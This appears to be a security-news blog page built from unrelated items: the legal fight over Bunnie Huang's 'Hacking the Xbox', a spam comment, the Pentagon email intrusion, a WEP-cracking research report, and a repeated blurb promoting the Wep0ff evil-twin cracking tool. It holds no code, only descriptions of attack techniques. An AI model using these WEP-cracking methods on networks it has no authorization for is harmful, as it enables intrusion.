Hacker-engineer Andrew “Bunnie” Huang says he’s already pre-sold
between 400 and 500 copies of his self-published tell-all “Hacking the
Xbox: an Introduction to Reverse Engineering,” weeks before its
scheduled May 27th publication date, despite — or perhaps because of
— looming suspicions by some that the book skirts the edges of
legality.
“It’ s about getting the book out there on principle, because I can’t
find a publisher willing to publish it,” says Huang. “I think it’s
controversial, but not illegal.”
With chapters on “Soldering Techniques” and “Installing a Blue LED,”
Huang’s how-to may not seem an obvious candidate for joining
Huckleberry Finn and Harry Potter on history’s sad list of once-banned
books. But Microsoft, the maker of the Xbox, has taken a dim view of
home modifications of the game console, focusing its litigious ire in
particular on “mod chips” that allow Xbox owners to run software that
Microsoft hasn’t approved and licensed. With a mod chip installed,
users can run everything from virtual juke boxes to the Linux
operating system on the game platform — as well as pirated copies of
Xbox games.
Last year, a Microsoft lawsuit temporarily shut down the Hong
Kong-based company Lik Sang, which sold mod chips over the Internet.
And last month, mod chip entrepreneur David Rocci was [40]sentenced to
five months in federal custody for conspiracy to violate the Digital
Millennium Copyright Act. Rocci was the proprietor of a U.S. website
that sold mod chips and helped users locate pirated copies of Xbox
games to run on their modified machines.
Huang says his book describes some types of mod chips — explains how
they work, and what lessons they offer designers of secure hardware
platforms. For example the “Matrix” chip installs solderlessly over a
test port manufacturers left on the Xbox motherboard. “You don’t leave
these test structures on the motherboard, if you want it secure,” says
Huang. Another chapter helps readers replace the machine’s firmware –
a mod chip trick used by sophisticated pirates and tinkerers. “They
can be used by the pirating community, and they can be used by the
Linux community — so that one chapter that talks about firmware
devices plays to the Linux community,” says Huang. “I believe that
should be a legal activity.”
DMCA Fears
The book also revisits a technique that cemented Huang’s reputation as
a hardware hacker last year, which involves building custom hardware
to intercept an encryption key as it crosses the Xbox’s internal
high-speed bus. To avoid legal complications, Huang published his
research paper on the technique only after receiving permission from
Microsoft, negotiated with the help of EFF attorney Lee Tien. “To get
the paper published in the first place we had to negotiate a legal
mine field,” say Tien, who went on to contribute a chapter on the
legalities of reverse engineering to Huang’s book.
But Huang didn’t get Microsoft’s blessing for Hacking the Xbox, which
goes beyond discussing a single hacking technique. The book aims to
teach readers how to think like a hardware hacker, using the internal
secrets of the game console the way a med school teacher uses Gray’s
Anatomy. With the boundaries of federal copyright law, particularly
the DMCA, unclear, Huang says tech-publishing house John Wiley & Sons
got cold feet and withdrew its plans to publish the book sometime
after Rocci’s guilty plea.
Wiley didn’t return phone calls on the matter.
Unable to find another publisher, Huang elected to sell the book
himself through the Web. He dug into his own pockets to fund a print
run of 1,000 books, which he says will be delivered to his home later
this month. “It’ll be only a matter of two weeks when a pallet of
books comes to my doorstep,” he says. “Every book will be boxed by my
own two hands.”
Huang began accepting credit cards through his [41]website this week,
after already selling nearly half of his initial print run through a
PayPal account. He says he’s barely reached the break-even point.
“He’s not going to make a huge amount of money,” says Tien. “He thinks
that it’s worthwhile stuff. That it’s interesting, and it’s teaching
people.”
“Mainly, at this point, it’s boiled down to a political battle, for
the freedom to tinker,” says Huang. “For my entire life I’ve been
playing with hardware. This is the first time someone’s told me I
can’t play with hardware because it’s illegal.”
Hi, If any one who visits the site and is intersted in EC – Council CEH videos, do let me know.
Drop me a mail at bharathraj.88@gmail.com with “EC – Council, CEH Videos” as subject.
The Pentagon got owned pretty hard with 1,500 accounts being taken offline due to a hack attack. For once however they did admit the incident and didn’t try to cover it over or brush it off.
I guess the amount of attacks they get is exponentially more than other networks…but still, I would have thought they should be super secure.
About 1,500 unclassified e-mail users at the Pentagon had their service disrupted yesterday when a hacker infiltrated the e-mail system, forcing the accounts to be taken offline.
In a briefing today with reporters in Washington at the Pentagon, Secretary of Defense Robert M. Gates confirmed the incident and said that the users were disconnected from the system after the intrusion was discovered.
“The reality is that the Defense Department is constantly under attack,” Gates said during the briefing. “Elements of the [Office of the Secretary of Defense] unclassified e-mail system were taken offline yesterday afternoon, due to a detected penetration. A variety of precautionary measures are being taken. We expect the system to be online again very soon.”
The funny thing is the Secretary of Defense himself doesn’t even use e-mail…so I doubt he even noticed what had happened.
Hopefully the government will sharpen up it’s ideas.
Gates said that he was not sure why the 1,500 users were removed temporarily from the system. “Well, I don’t know the answer to that, and they’re still investigating it.”
Gates said he doesn’t use e-mail, so he didn’t know if his account was affected.
“I don’t do e-mail,” he said. “I’m a very low-tech person.”
A spokesman at the Department of Defense late this afternoon said he had no additional information about the incident.
Cryptographic researchers claim that the security found in most wireless access points can now be cracked in under a minute.
By refining an attack against Wired Equivalent Privacy (Wep) developed by Andreas Klein in 2005, enough packets could be collected to open up a Wep-protected network in around a minute. This is according to Erik Tews, Andrei Pychkine and Ralf-Philipp Weinmann at the cryptography and computer algebra group at the Technical University Darmstadt in Germany.
Cracks used on Wep used to take around 40 minutes as techniques needed far more packets to inspect to find the key used to encrypt the network.
The researchers said that it was possible to recover a 104-bit Wep key with a 50 per cent probability of success using just 40,000 captured packets.
‘For 60,000 available data packets, the success probability is about 80 per cent and for 85,000 data packets about 95 per cent,’ the researchers said. ‘Using active techniques like deauth and ARP re-injection, 40,000 packets can be captured in less than one minute under good conditions.’
They said the computation of the crack took about three seconds using 3MB of memory on a Pentium-M 1.7 GHz machine. ‘The same attack can be used for 40-bit keys too with an even higher success probability,’ they said.
The researchers implemented a proof-of-concept of the attack with the aircrack-ptw tool together with the aircrack-ng toolsuite. The tool is similar to aircrack-ng, which has been used in the past to crack Wep protected networks.
‘We believe that WEP should not be used in sensitive environments. Most wireless equipment vendors provide support for TKIP (as known as WPA1) and CCMP (also known as WPA2) which provides a much higher security level. All users should switch to WPA1 or even better WPA2,’ the researchers said.
The researchers plan to give a talk about the new crack at the Easterhegg 2007 security conference in Hamburg this month.
A paper describing the details and methods used in the attack can be found here.
Source: PcPro
Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients.
It uses combination of fragmentation and evil twin attacks to generate
traffic which can be used for KoreK-style WEP-key recovery.
This tool can be used to mount fake access point attack against WEP-based wireless clients.
Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients.
It uses combination of fragmentation and evil twin attacks to generate
traffic which can be used for KoreK-style WEP-key recovery.
This tool can be used to mount fake access point attack against WEP-based wireless clients.
You can download it here: